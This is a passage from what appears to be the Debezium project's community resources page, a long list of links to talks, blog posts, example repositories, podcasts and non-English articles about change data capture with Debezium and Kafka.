https:\/\/www.slideshare.net\/kgwap\/kafka-connect-debezium?ref=http:\/\/kasundon.com\/2018\/07\/08\/streaming-mysql-change-sets-to-kafka-aws-kinesis\/[\"Kafka Connect - Debezium; Stream MySQL Events to Kafka\"] by Kasun Don; 2018\n* \"Streaming Database Changes with Debezium\" by Gunnar Morling (https:\/\/www.youtube.com\/watch?v=IOZ2Um6e430[Video recording] from Devoxx 2017; https:\/\/speakerdeck.com\/gunnarmorling\/data-streaming-for-microservices-using-debezium[Slides] from RivieraDev 2018)\n* https:\/\/speakerdeck.com\/xenji\/kafka-and-debezium-at-trivago-code-dot-talks-2017-edition[\"Kafka and Debezium at trivago\"] by https:\/\/twitter.com\/xenji\/[Mario M\u00fcller] and https:\/\/twitter.com\/rk3rn3r\/[Ren\u00e9 Kerner]; Code.Talks 2017\n* https:\/\/vimeo.com\/168409093[\"Event Sourcing with Debezium and Kafka\"] by Christian Posta; 2016\n\n== Blog Posts & Articles\n\n* https:\/\/medium.com\/modanisa-engineering\/integrating-grafana-notifications-with-gitlab-pipeline-to-restart-debezium-tasks-using-go-1378c9eaf7b8[\"Integrating Grafana Notifications with GitLab Pipeline to restart Debezium tasks using Go\"] by Abdulsamet \u0130LER\u0130\n* https:\/\/www.reddit.com\/r\/RedditEng\/comments\/qkfx7a\/change_data_capture_with_debezium\/[\"Change Data Capture with Debezium\"] by Adriel Velazquez and Alan Tai\n* https:\/\/medium.com\/cermati-tech\/practical-notes-in-change-data-capture-with-debezium-and-postgres-fe31bb11ab78[\"Practical Notes in Change Data Capture with Debezium and Postgres\"] by Sharath Gururaj\n* https:\/\/medium.com\/google-cloud\/change-data-capture-with-debezium-server-on-gke-from-cloudsql-for-postgresql-to-pub-sub-d1c0b92baa98[\"Change Data Capture with Debezium Server on GKE from CloudSQL for PostgreSQL to Pub\/Sub\"] by Berker Narol\n* https:\/\/vkontech.com\/mongodb-change-data-capture-via-debezium-kafka-connector-with-a-net-5-client\/[\"MongoDB Change Data Capture via Debezium Kafka Connector with a .NET 5 Client\"] by Vasil Kosturski\n* https:\/\/engineering.outschool.com\/posts\/journey-to-better-search\/[\"The Journey to Better Search\"] by Jess Monroe, Nuria Ruiz and Parima Shah\n* https:\/\/snourian.com\/reliable-messaging-outbox-pattern-kafka-debezium-oracle-micronaut-kubernetes\/[\"Reliable Messaging in Microservices \u2013 Implementing Outbox Pattern using Kafka, Debezium, Micronaut, and Oracle Database on Kubernetes\"] by Sina Nourian\n* https:\/\/www.wix.engineering\/post\/the-reactive-monolith-how-to-move-from-crud-to-event-sourcing[\"The Reactive Monolith - How to Move from CRUD to Event Sourcing\"] by Jonathan David\n* https:\/\/techcommunity.microsoft.com\/t5\/azure-database-for-mysql\/cdc-in-azure-database-for-mysql-flexible-server-using-kafka\/ba-p\/2780943[\"CDC in Azure Database for MySQL \u2013 Flexible Server using Kafka, Debezium, and Azure Event Hubs\"] by Sudheesh Narayanaswamy\n* https:\/\/vectorized.io\/blog\/redpanda-debezium\/[\"Using Debezium and Redpanda for CDC\"] by Almas Maksotov\n* https:\/\/medium.com\/event-driven-utopia\/understanding-materialized-views-3-stream-table-joins-with-cdc-77591d2d6fa0[\"Understanding Materialized Views \u2014 Stream-Table Joins with CDC\"] by Dunith Dhanushka\n* https:\/\/materialize.com\/change-data-capture-is-having-a-moment-why[\"Change Data Capture is having a moment. 
Why?\"] by Andy Hattemer\n* https:\/\/braindose.blog\/2021\/09\/13\/true-atomic-microservices-debezium\/[\"A True Atomic Microservices Implementation with Debezium to Ensure Data Consistency\"] by CK Gan\n* https:\/\/itnext.io\/hydrating-a-data-lake-using-log-based-change-data-capture-cdc-with-debezium-apicurio-and-kafka-799671e0012f[\"Hydrating a Data Lake using Log-based Change Data Capture (CDC) with Debezium, Apicurio, and Kafka Connect on AWS\"] by Gary A. Stafford\n* Change Data Capture (CDC) With Kafka Connect and the Debezium Cassandra Connector (https:\/\/www.instaclustr.com\/change-data-capture-cdc-with-kafka-and-debezium\/[Part 1], https:\/\/www.instaclustr.com\/change-data-capture-cdc-with-kafka-connect-and-the-debezium-cassandra-connector-part-2\/[Part 2]) by Paul Brebner\n* https:\/\/docs.microsoft.com\/en-us\/samples\/azure-samples\/azure-sql-db-change-stream-debezium\/smart-bulk-copy\/[\"Azure SQL \/ SQL Server Change Stream with Debezium\"] by Davide Mauri\n* https:\/\/developers.redhat.com\/articles\/2021\/06\/14\/application-modernization-patterns-apache-kafka-debezium-and-kubernetes[\"Application modernization patterns with Apache Kafka, Debezium, and Kubernetes\"] by Bilgin Ibryam\n* https:\/\/eresh-gorantla.medium.com\/change-data-capture-use-cases-and-real-world-example-using-debezium-fe4098579d49[\"Change Data Capture, Use Cases and real-world example using Debezium\"] by Eresh Gorantla\n* https:\/\/medium.com\/event-driven-utopia\/configuring-debezium-to-capture-postgresql-changes-with-docker-compose-224742ca5372[\"Configuring Debezium to Capture PostgreSQL Changes with Docker Compose\"] by Dunith Dhanushka\n* https:\/\/developers.redhat.com\/articles\/2021\/07\/30\/avoiding-dual-writes-event-driven-applications[\"Avoiding dual writes in event-driven applications\"] by Bernard Tison\n* https:\/\/dev.to\/foolonthehill\/build-a-event-driven-app-with-micronaut-kafka-and-debezium-11be[\"Build a event-driven app with Micronaut, Kafka and Debezium\"] by George Oliveira\n* https:\/\/pradeepdaniel.medium.com\/real-time-change-data-replication-to-snowflake-using-kafka-and-debezium-d6ebb0d4eb29[\"Creating an ETL data pipeline to sync data to Snowflake using Kafka and Debezium\"] by Pradeep Daniel \n* http:\/\/www.greentechjava.com\/2021\/07\/streaming-nrt-data-with-kafka-connect.html[\"Streaming NRT data with kafka connect and Debezium \"] by Akash Sharma\n* https:\/\/thedataguy.in\/integrate-debezium-with-aws-secret-manager-for-retrieving-passwords\/[\"Integrate Debezium with AWS Secret Manager For Retrieving Passwords\"] by Bhuvanesh\n* https:\/\/www.rtinsights.com\/application-modernization-and-change-data-capture\/[\"Application Modernization and Change Data Capture\"] by Salvatore Salamone\n* https:\/\/daily.dev\/blog\/building-a-fault-tolerant-event-driven-architecture-with-google-cloud-pulumi-and-debezium[\"Building a fault-tolerant event-driven architecture with Google Cloud, Pulumi and Debezium\"] by Ido Shamun\n* https:\/\/thenewstack.io\/kubernetes-run-analytics-at-the-edge-postgres-kafka-debezium\/[\"Kubernetes-Run Analytics at the Edge: Postgres, Kafka, Debezium\"] by Jonathan Katz\n* https:\/\/www.alibabacloud.com\/blog\/real-time-data-synchronization-based-on-flink-sql-cdc_597750[\"Real-Time Data Synchronization Based on Flink SQL CDC\"] by Wu Chong\n* https:\/\/medium.com\/globant\/change-data-capture-with-debezium-6eb523d57b1c[\"Change Data Capture with Debezium\"] by Ankit Mishra\n* 
https:\/\/medium.com\/event-driven-utopia\/8-practical-use-cases-of-change-data-capture-8f059da4c3b7[\"8 Practical Use Cases of Change Data Capture\"] by Dunith Dhanushka\n* https:\/\/www.wix.engineering\/post\/change-data-capture-at-deviantart[\"Change Data Capture at DeviantArt\"] by Ruslan Danilin\n* https:\/\/www.infinitecatalog.com\/blog\/2021\/05\/30\/materialized-world.html[\"We Are Living in a Materialized World\"] by Udbhav Gupta\n* https:\/\/smarttechie.org\/2021\/03\/17\/audit-database-changes-with-debezium\/[\"Audit Database Changes with Debezium\"] by Siva Prasad Rao Janapati\n* https:\/\/medium.com\/geekculture\/change-data-capture-using-debezium-ec48631d643a[\"Change Data Capture \u2014 Using Debezium\"] by Ritresh Girdhar\n* https:\/\/lenses.io\/blog\/2021\/04\/change-data-capture-apache-kafka-break-up-monolith\/[\"Change Data Capture and Kafka to break up your monolith\"] by Guillaume Aym\u00e9\n* https:\/\/kvenkatraman.medium.com\/snowflake-near-real-time-ingestion-from-rdbms-using-debezium-and-kafka-92f00e2ee897[\"Snowflake - Near Real-Time Ingestion from RDBMS using Debezium and Kafka\"] by Karthik Venkatraman\n* https:\/\/medium.com\/capital-one-tech\/the-journey-from-batch-to-real-time-with-change-data-capture-c598e56146be[\"The Journey from Batch to Real-time with Change Data Capture\"] by Andrew Bonham\n* https:\/\/tech.willhaben.at\/change-data-capturing-with-debezium-at-willhaben-3579afd8be6b[\"Change Data Capturing with Debezium at willhaben\"] by Maurizio Rinder\n* https:\/\/shopify.engineering\/capturing-every-change-shopify-sharded-monolith[\"Capturing Every Change From Shopify\u2019s Sharded Monolith\"] by John Martin\n* https:\/\/dev.to\/hazelcast\/beyond-hello-world-zero-downtime-deployments-on-kubernetes-162o[\"Beyond 'Hello World': Zero-Downtime Deployments on Kubernetes \"] by Nicolas Frankel\n* https:\/\/lambda.grofers.com\/origins-of-data-lake-at-grofers-6c011f94b86c[\"Origins of Data Lake at Grofers -- Evolution of our data pipelines\"] by Akshay Agarwal\n* https:\/\/ducmanhphan.github.io\/2020-08-09-how-to-work-with-debezium\/[\"How to work with Debezium\"] by Manh Phan\n* https:\/\/reorchestrate.com\/posts\/debezium-performance-impact\/[\"Debezium does not impact source database performance\"] by Mike Seddon\n* https:\/\/medium.com\/incognia-tech\/ensuring-data-consistency-across-services-with-the-transactional-outbox-pattern-90be4d735cb0[\"Ensuring data consistency across services with the Transactional Outbox pattern\"] by Mateus Moury and Rafael Acevedo\n* https:\/\/medium.com\/event-driven-utopia\/a-gentle-introduction-to-event-driven-change-data-capture-683297625f9b[\"A Gentle Introduction to Event-driven Change Data Capture\"] by Dunith Dhanushka\n* https:\/\/maciejszymczyk.medium.com\/change-data-capture-convert-your-database-into-a-stream-with-debezium-356c1a49b459[\"Change Data Capture \u2014 Convert your database into a stream with Debezium\"] by Maciej Szymczyk\n* https:\/\/info.crunchydata.com\/blog\/postgres-change-data-capture-with-debezium[\"Change Data Capture in Postgres With Debezium\"] by Dave Cramer\n* https:\/\/medium.com\/apache-pinot-developer-blog\/change-data-analysis-with-debezium-and-apache-pinot-b4093dc178a7[\"Change Data Analysis with Debezium and Apache Pinot\"] by Kenny Bastani\n* https:\/\/juliuskrah.com\/blog\/2020\/01\/06\/streaming-changes-from-keycloak-using-debezium-cdc\/[\"Streaming Changes from Keycloak using Debezium (CDC)\"] by Julius Krah\n* 
https:\/\/www.tigeranalytics.com\/blog\/building-nrt-data-pipeline-debezium-kafka-snowflake\/[\"Building a Near-Real Time (NRT) Data Pipeline using Debezium, Kafka, and Snowflake\"] by Arun Kumar Ponnurangam and Karunakar Goud\n* https:\/\/medium.com\/data-rocks\/creating-a-no-code-aws-native-oltp-to-olap-data-pipeline-part-1-50481b57dc30[\"Creating a no-code AWS native OLTP to OLAP data pipeline \u2014 Part 1\"] by Haris Michailidis\n* https:\/\/www.zuehlke.com\/en\/insights\/design-failure-distributed-transactions-microservices[\"Design for Failure \u2014 Distributed Transactions in Microservices\"] by Darren Boo\n* https:\/\/blog.rafaelgss.com.br\/autonomous-microservices[\"Autonomous Microservices - Outbox Pattern\"] by Rafael Gonzaga\n* https:\/\/medium.com\/trendyol-tech\/debezium-with-simple-message-transformation-smt-4f5a80c85358[\"Debezium with Simple Message Transformation (SMT)\"] by Okan Yildirim\n* https:\/\/www.systemcraftsman.com\/2020\/11\/30\/asap-the-storified-demo-of-introduction-to-debezium-and-kafka-on-kubernetes\/[\"ASAP! \u2013 The Storified Demo of Introduction to Debezium and Kafka on Kubernetes\"] by Aykut Bulgu\n* https:\/\/elephanttamer.net\/?p=50[\"Setting up PostgreSQL for Debezium\"] by Micha\u0142 Mackiewicz\n* https:\/\/medium.com\/@midhunsukumaran.mec\/a-year-and-a-half-with-debezium-f4f323b4909d[\"A year and a half with Debezium: CDC With MySQL\"] by Midhun Sukumaran\n* https:\/\/jet-start.sh\/blog\/2020\/10\/06\/enabling-full-text-search[\"Enabling Full-text Search with Change Data Capture in a Legacy Application\"] by Franti\u0161ek Hartman\n* https:\/\/medium.com\/@sumant.rana\/sync-mysql-to-postgresql-using-debezium-and-kafkaconnect-d6612489fd64[\"Sync MySQL to PostgreSQL using Debezium and Kafka Connect\"] by Sumant Rana\n* https:\/\/turkogluc.com\/postgresql-capture-data-change-with-debezium\/[\"Making Sense of Change Data Capture Pipelines for Postgres with Debezium Kafka Connector\"] by Cemal Turkoglu\n* https:\/\/reveation-labs.medium.com\/streaming-events-from-sql-server-to-event-hub-in-azure-using-debezium-55dfd1a0e214[\"Streaming Events from SQL Server to Event Hub in Azure using Debezium\"] by Reveation Labs\n* https:\/\/developers.redhat.com\/cheat-sheets\/debezium-openshift-cheat-sheet[\"Debezium on OpenShift Cheat Sheet\"] by Abdellatif Bouchama\n* https:\/\/medium.com\/data-rocks\/managing-kafka-connectors-at-scale-using-kafka-connect-manager-kcm-31d887de033c[\"Managing Kafka Connectors at scale using Kafka Connect Manager\"] by Sandeep Mehta\n* https:\/\/medium.com\/dana-engineering\/streaming-data-changes-in-mysql-into-elasticsearch-using-debezium-kafka-and-confluent-jdbc-sink-8890ad221ccf[\"How to stream data changes from MySQL into Elasticsearch using Debezium\"] by Rizqi Nugroho\n* https:\/\/medium.com\/@changeant\/implementing-the-transactional-outbox-pattern-with-debezium-in-quarkus-f2680306951[\"Implementing the Transactional Outbox pattern with Debezium in Quarkus\"] by Iain Porter\n* https:\/\/www.confluent.io\/blog\/cdc-and-streaming-analytics-using-debezium-kafka\/[\"Analysing Changes with Debezium and Kafka Streams\"] by Mike Fowler\n* https:\/\/medium.com\/@bogdan.dina03\/de-coupling-yourself-507a15fa100d[\"(De)coupling yourself\"] by Dina Bogdan\n* https:\/\/medium.com\/comsystoreply\/stream-your-database-into-kafka-with-debezium-a94b2f649664[\"Stream Your Database into Kafka with Debezium -- An Introduction and Experience Report\"] by David Hettler\n* 
https:\/\/medium.com\/@limadelrey\/kafka-connect-how-to-create-a-real-time-data-pipeline-using-change-data-capture-cdc-c60e06e5306a[\"Kafka Connect: How to create a real time data pipeline using Change Data Capture (CDC)\"] by Francisco Lima\n* https:\/\/dev.to\/abhirockzz\/tutorial-set-up-a-change-data-capture-architecture-on-azure-using-debezium-postgres-and-kafka-49h6[\"Tutorial: Set up a Change Data Capture architecture on Azure using Debezium, Postgres and Kafka \"] by Abhishek Gupta\n* Kafka Connect \u2013 Offset commit errors by Javier Holguera: https:\/\/www.javierholguera.com\/2020\/06\/02\/kafka-connect-offset-commit-errors-i\/[Part 1], https:\/\/www.javierholguera.com\/2020\/06\/16\/kafka-connect-offset-commit-errors-ii\/[Part 2]\n* https:\/\/medium.com\/@samuel_vdc\/data-liberation-pattern-using-debezium-engine-4fd32b92d826[\"Data liberation pattern using the Debezium engine\"] by Samuel Vandecasteele\n* https:\/\/medium.com\/hepsiburadatech\/postgresql-db-change-data-capture-cdc-using-debezium-f1a933174fd8[\"PostgreSql Db Change Data Capture (CDC) Using Debezium\"] by Caner Tosuner\n* http:\/\/www.mastertheboss.com\/jboss-frameworks\/debezium\/getting-started-with-debezium[\"Getting started with Debezium\"] by Francesco Marchioni\n* https:\/\/dev.to\/oryanmoshe\/debezium-custom-converters-timestampconverter-26hh[\"Debezium Custom Converters - TimestampConverter\"] by Oryan Moshe\n* https:\/\/www.gridgain.com\/resources\/blog\/change-data-capture-between-mysql-and-gridgain-debezium[\"Change Data Capture Between MySQL and GridGain With Debezium\"] by Evgenii Zhuravlev\n* https:\/\/cloud.google.com\/blog\/products\/data-analytics\/how-to-move-data-from-mysql-to-bigquery[\"How do I move data from MySQL to BigQuery?\"], discussing usage of the Debezium embedded engine with Google Cloud Dataflow, by Pablo Estrada and Griselda Cuevas\n* https:\/\/mike-costello.github.io\/2020\/04\/01\/Using_Debezium_With_AMQP_Events\/[\"Use CDC to create AMQP Based Events with Apache Camel and Debezium\"] by Michael Costello\n* https:\/\/gennadny.wordpress.com\/2020\/03\/22\/the-dead-philosophers-club-streaming-data-from-sql-server-to-azure-via-debezium-and-apache-kafka\/[\"The Dead Philosophers Club \u2013 Streaming Data from SQL Server to Azure via Debezium and Apache Kafka\"] by Gennady Kostinsky\n* https:\/\/medium.com\/everything-full-stack\/streaming-data-changes-to-a-data-lake-with-debezium-and-delta-lake-pipeline-299821053dc3[\"Streaming data changes to a Data Lake with Debezium and Delta Lake pipeline\"] by Yinon D. 
Nahamu\n* https:\/\/www.infoq.com\/news\/2020\/01\/cdc-debezium-1-0-final-released\/[\"Change Data Capture Tool Debezium 1.0 Final Released\"] by Jan Stenberg\n* https:\/\/strimzi.io\/2020\/01\/27\/deploying-debezium-with-kafkaconnector-resource.html[\"Deploying Debezium using the new KafkaConnector resource\"] by Tom Bentley\n* https:\/\/www.sderosiaux.com\/articles\/2020\/01\/06\/learnings-from-using-kafka-connect-debezium-postgresql\/[\"Learnings from using Kafka Connect - Debezium - PostgreSQL\"] by St\u00e9phane Derosiaux\n* https:\/\/thedataguy.in\/monitor-debezium-mysql-connector-with-prometheus-and-grafana\/[\"Monitor Debezium MySQL Connector With Prometheus And Grafana\"] by Bhuvanesh\n* http:\/\/www.carbonrider.com\/2019\/11\/16\/change-data-capture-with-apache-kafka-postgresql-kafka-connect-and-debezium\/[\"Change Data Capture with Apache Kafka, PostgreSQL, Kafka Connect and Debezium\"] by Yogesh Jadhav\n* https:\/\/dzone.com\/articles\/implementing-the-outbox-pattern[\"Implementing the Outbox Pattern\"] by Sohan Ganapathy\n* https:\/\/medium.com\/engineering-varo\/event-driven-architecture-and-the-outbox-pattern-569e6fba7216[\"Event-Driven Architecture and the Outbox Pattern\"] by Rod Shokrian\n* https:\/\/medium.com\/convoy-tech\/logs-offsets-near-real-time-elt-with-apache-kafka-snowflake-473da1e4d776[\"Logs & Offsets: (Near) Real Time ELT with Apache Kafka + Snowflake\"] by Adrian Kreuziger\n* https:\/\/info.crunchydata.com\/blog\/postgresql-change-data-capture-with-debezium[\"PostgreSQL Change Data Capture With Debezium\"] by Dave Cramer\n* https:\/\/developers.redhat.com\/blog\/2019\/09\/03\/cdc-pipeline-with-red-hat-amq-streams-and-red-hat-fuse\/[\"CDC pipeline with Red Hat AMQ Streams and Red Hat Fuse\"] by Sadhana Nandakumar\n* https:\/\/mauridb.medium.com\/sql-server-change-stream-b204c0892641[\"SQL Server Change Stream\"] by Davide Mauri\n* https:\/\/medium.com\/@hpgrahsl\/communicating-data-changes-across-service-boundaries-safely-129c4eb5db8[\"Communicating Data Changes Across Service Boundaries\u2026 Safely!\"] by Hans-Peter Grahsl\n* https:\/\/blog.clairvoyantsoft.com\/mysql-cdc-with-apache-kafka-and-debezium-3d45c00762e4[\"MySQL CDC with Apache Kafka and Debezium\"] by Kushal Yellam\n* https:\/\/thoughts-on-java.org\/outbox-pattern-with-cdc-and-debezium\/[\"Implementing the Outbox Pattern with CDC using Debezium\"] by Thorben Janssen\n* https:\/\/blog.zhaw.ch\/splab\/2019\/05\/03\/serverless-plumbing-streaming-mysql-events-to-knative-services\/[\"Serverless Plumbing: Streaming MySQL Events to Knative Services\"] by Mohammed Al-Ameen\n* https:\/\/medium.com\/yotpoengineering\/building-zero-latency-data-lake-using-change-data-capture-f93ef50eb066[\"Building zero-latency data lake using Change Data Capture\"] by Ofir Ventura\n* https:\/\/medium.com\/high-alpha\/data-stream-processing-for-newbies-with-kafka-ksql-and-postgres-c30309cfaaf8[\"Data Stream Processing for Newbies with Kafka, KSQL, and Postgres\"] by Maria Patterson\n* https:\/\/blog.couchbase.com\/kafka-connect-mysql-couchbase-debezium\/[\"Kafka Connect from MySQL to Couchbase with Debezium\"] by Matthew Groves\n* https:\/\/www.linkedin.com\/pulse\/change-data-capture-postgresql-via-debezium-part-1-paolo-scarpino\/[\"Change Data Capture on PostgreSQL via Debezium\"] by Paolo Scarpino\n* https:\/\/medium.com\/jw-player-engineering\/southpaw-176aea5f4583[\"Southpaw - Streaming Left Joins with Change Data Capture\"] by Morrigan Jones\n* 
https:\/\/medium.com\/@hpgrahsl\/connecting-apache-kafka-to-azure-cosmosdb-part-ii-b96cf0f5cdfa[\"Connecting Apache Kafka to Azure CosmosDB\u200a\u2014\u200aPart II\"] by Hans-Peter Grahsl\n* https:\/\/vladmihalcea.com\/how-to-extract-change-data-events-from-mysql-to-kafka-using-debezium\/[\"How to extract change data events from MySQL to Kafka using Debezium\"] by Vlad Mihalcea\n* https:\/\/rmoff.net\/2019\/10\/16\/using-kafka-connect-and-debezium-with-confluent-cloud\/[\"Using Kafka Connect and Debezium with Confluent Cloud\"]\n* https:\/\/rmoff.net\/2019\/11\/20\/streaming-data-from-sql-server-to-kafka-to-snowflake-with-kafka-connect\/[\"Streaming data from SQL Server to Kafka to Snowflake \u2744\ufe0f with Kafka Connect and Debezium\"]\n* https:\/\/rmoff.net\/2018\/03\/24\/streaming-data-from-mysql-into-kafka-with-kafka-connect-and-debezium\/[\"Streaming Data from MySQL into Kafka with Kafka Connect and Debezium\"] by Robin Moffatt\n* https:\/\/rmoff.net\/2018\/03\/27\/streaming-data-from-mongodb-into-kafka-with-kafka-connect-and-debezium\/[\"Streaming Data from MongoDB into Kafka with Kafka Connect and Debezium\"] by Robin Moffatt\n* https:\/\/medium.com\/@tilakpatidar\/streaming-data-from-postgresql-to-kafka-using-debezium-a14a2644906d[\"Streaming data from PostgreSQL to Kafka using Debezium\"] by Tilak Patidar\n* https:\/\/medium.com\/blablacar-tech\/streaming-data-out-of-the-monolith-building-a-highly-reliable-cdc-stack-d71599131acb[\"Streaming Data out of the Monolith: Building a Highly Reliable CDC Stack\"] by Yuancheng Peng\n* https:\/\/iamninad.com\/how-debezium-kafka-stream-can-help-you-write-cdc\/[\"How Debezium & Kafka Streams Can Help You Write CDC Solution\"] by Neenad Ingole\n* https:\/\/jakubbujny.com\/2018\/09\/20\/replicate-cloud-aws-rds-mysql-to-on-premise-postgresql-in-docker-future-is-today-debezium-and-kafka-on-aws-eks\/[Replicate cloud AWS RDS MySQL to on-premise PostgreSQL in Docker \u2013 future is today! 
Debezium and Kafka on AWS EKS] by Jakub Bujny\n* https:\/\/medium.com\/@mauridb\/sql-server-change-stream-b204c0892641[\"SQL Server Change Stream - Responding to data changes in real time using modern technologies\"]\n* https:\/\/medium.com\/@hpgrahsl\/optimizing-read-access-to-sharded-mongodb-collections-utilizing-apache-kafka-connect-cdcd8ec6228[\"Optimizing Read Access to Sharded MongoDB Collections utilizing Apache Kafka Connect\"] by Hans-Peter Grahsl\n\n== Example Code\n\n* https:\/\/github.com\/debezium\/debezium-examples\/[Debezium's official examples]\n* https:\/\/ibm-cloud-architecture.github.io\/refarch-eda\/use-cases\/db2-debezium\/[DB2 Change Data Capture with Debezium]\n* https:\/\/github.com\/yorek\/debezium-sql-change-stream[\"SQL Server Change Stream sample using Debezium\"] by Davide Mauri\n* https:\/\/github.com\/foogaro\/change-data-capture[\"CDC project based on Debezium, Kafka, MS SQL Server, Infinispan and Teiid, entirely based on containers\"] by Luigi Fugaro\n* https:\/\/github.com\/fvaleri\/cdc[\"CDC with Camel and Debezium: code-driven vs configuration-driven pipelines\"] by Federico Valeri\n* https:\/\/github.com\/morsapaes\/flink-sql-CDC[\"Change Data Capture with Flink SQL and Debezium\"] by Marta Paes\n* https:\/\/github.com\/suadev\/microservices-change-data-capture-with-debezium[\"Microservices Change Data Capture With Debezium\"] by Suat K\u00f6se\n* https:\/\/github.com\/hyagli\/cdc-python-netcore\/[\"Outbox Pattern Implementation using Debezium and Google Protocol Buffers\"] by Huseyin Yagli\n* https:\/\/youtu.be\/fQoTvEtho_4\/[\"Monitoring Kafka Debezium Connector metrics using Prometheus\"] by Waqas Dilawar\n\n== Interviews and Podcasts\n\n* https:\/\/www.youtube.com\/watch?v=yuJ1r_xUcAo[Trino Community Podcast Ep. #25 -- Trino Going Through Changes; together with Ashhar Hasan, Ayush Chauhan, Brian Olsen and Manfred Moser]\n* https:\/\/www.dataengineeringpodcast.com\/debezium-change-data-capture-episode-114\/[Change Data Capture For All Of Your Databases With Debezium -- episode #114 of the Data Engineering Podcast by Tobias Macey; together with Randall Hauch]\n* https:\/\/www.buzzsprout.com\/186154\/1770184[MySQL, Cassandra, BigQuery, and Streaming Analytics with Joy Gao]\n* http:\/\/airhacks.fm\/#episode_57[CDC, Debezium, streaming and Apache Kafka -- episode #57 of Adam Bien's airhacks.fm podcast]\n* https:\/\/www.buzzsprout.com\/186154\/1365043-change-data-capture-with-debezium-ft-gunnar-morling[Change Data Capture with Debezium ft. 
Gunnar Morling]\n* https:\/\/www.youtube.com\/watch?v=H-yGdKy48VE[Interview with Gunnar Morling] for thoughts-on-java.org\n\n== Other\n\n* https:\/\/www.thoughtworks.com\/radar\/platforms\/debezium[Debezium entry in the ThoughtWorks Technology Radar]\n* https:\/\/learn.openshift.com\/middleware\/debezium-getting-started\/[Getting Started with Debezium on OpenShift]; interactive Debezium learning scenario allowing you to try out Debezium on OpenShift within minutes\n\n== Non-English Resources\n\n=== \ud83c\uddea\ud83c\uddf8 Spanish\n\n* https:\/\/www.youtube.com\/watch?v=y2A4x5ZF7dY[\"Iniciaci\u00f3n a CDC con Debezium\"] by Jes\u00fas Pau de la Cruz and Jos\u00e9 Alberto Ruiz Casarrubios (video)\n* https:\/\/www.paradigmadigital.com\/dev\/vistazo-debezium-herramienta-change-data-capture\/[\"Un vistazo a Debezium: una herramienta completa de Change Data Capture\"] by Jesus Pau de la Cruz (blog post)\n\n=== \ud83c\uddf7\ud83c\uddfa Russian\n\n* https:\/\/habr.com\/ru\/company\/neoflex\/blog\/567930\/[\"\u041f\u043e\u0442\u043e\u043a\u043e\u0432\u044b\u0439 \u0437\u0430\u0445\u0432\u0430\u0442 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439 \u0438\u0437 PostgreSQL\/MySQL \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Apache Flink\"] by Alex Sergeenko (blog post)\n* https:\/\/habr.com\/ru\/company\/flant\/blog\/523510\/[\"\u0417\u043d\u0430\u043a\u043e\u043c\u0441\u0442\u0432\u043e \u0441 Debezium \u2014 CDC \u0434\u043b\u044f Apache Kafka\"] (blog post)\n\n=== \ud83c\udde9\ud83c\uddea German\n\n* https:\/\/www.bigdata-insider.de\/was-ist-debezium-a-1044399\/[\"Was ist Debezium?\"] by Stefan Luber (article)\n* https:\/\/decompose.io\/2021\/01\/10\/debezium\/[\"Debezium\"] by Teitelberg (blog post)\n* https:\/\/blogs.zeiss.com\/digital-innovation\/de\/datenbankaenderungen-teil-1\/[\"Datenbank\u00e4nderungen erkennen und streamen mit Debezium und Apache Kafka (Teil 1) \u2013 Die Theorie\"] by Richard Mogwitz (blog post)\n* https:\/\/blogs.zeiss.com\/digital-innovation\/de\/datenbankaenderungen-teil-2\/[\"Datenbank\u00e4nderungen erkennen und streamen mit Debezium und Apache Kafka (Teil 2) \u2013 Ein Beispiel\"] by Richard Mogwitz (blog post)\n* https:\/\/www.heise.de\/developer\/artikel\/Im-Gespraech-Gunnar-Morling-ueber-Debezium-und-CDC-4513865.html[\"Im Gespr\u00e4ch: Gunnar Morling \u00fcber Debezium und CDC\"]; interview with Thorben Janssen for heise.de (podcast)\n\n=== \ud83c\udde7\ud83c\uddf7 Portuguese\n\n* https:\/\/medium.com\/@viavarejo.productdevelopment\/uma-estrat%C3%A9gia-de-cdc-com-debezium-e27aa945d7b0[\"Uma estrat\u00e9gia de CDC com Debezium\"] by Jo\u00e3o Gabriel Mello, Brunno Lira and Marcelo Costa (blog post)\n* https:\/\/www.infoq.com\/br\/presentations\/postgresql-ao-datalake-utilizando-kafkadebezium\/[\"Do PostgreSQL ao Data Lake utilizando Kafka-Debezium\"] by Paulo Singaretti, PGConf S\u00e3o Paulo 2019 (conference session recording)\n* https:\/\/www.youtube.com\/watch?v=jtVD-HIJG9M&feature=youtu.be[\"Quarkus #25: Monitoramento de qualquer opera\u00e7\u00e3o em uma tabela do banco de dados com Debezium\"] by Vinicius Ferraz (screen cast)\n* https:\/\/elo7.dev\/cdc-parte-1\/[\"Introdu\u00e7\u00e3o ao Change Data Capture (CDC)\"] by Renato Sardinha (blog post)\n* https:\/\/medium.com\/@singaretti\/streaming-de-dados-do-postgresql-utilizando-kafka-debezium-v2-d49f46d70b37[\"Streaming de dados (do PostgreSQL) utilizando Kafka|Debezium (v2)\"] by Paulo Singaretti (blog post)\n\n=== \ud83c\uddef\ud83c\uddf5 Japanese\n\n* \ud83c\uddef\ud83c\uddf5 
https:\/\/rheb.hatenablog.com\/entry\/2020\/02\/19\/debezium-camel-integration\/[\"Debezium\u3068Apache Camel\u306e\u30a4\u30f3\u30c6\u30b0\u30ec\u30fc\u30b7\u30e7\u30f3\u30b7\u30ca\u30ea\u30aa\"] (Japanese translation of the blog post link:\/blog\/2020\/02\/19\/debezium-camel-integration\/[Integration Scenarios with Debezium and Apache Camel] by Jiri Pechanec)\n* \ud83c\uddef\ud83c\uddf5 https:\/\/rheb.hatenablog.com\/entry\/2020\/02\/10\/event-sourcing-vs-cdc\/[\"\u30de\u30a4\u30af\u30ed\u30b5\u30fc\u30d3\u30b9\u306e\u305f\u3081\u306e\u5206\u6563\u30c7\u30fc\u30bf \u301c \u30a4\u30d9\u30f3\u30c8\u30bd\u30fc\u30b7\u30f3\u30b0 vs \u30c1\u30a7\u30f3\u30b8\u30c7\u30fc\u30bf\u30ad\u30e3\u30d7\u30c1\u30e3\"] (Japanese translation of the blog post link:\/blog\/2020\/02\/10\/event-sourcing-vs-cdc\/[Distributed Data for Microservices \u2014 Event Sourcing vs. Change Data Capture] by Eric Murphy)\n* \ud83c\uddef\ud83c\uddf5 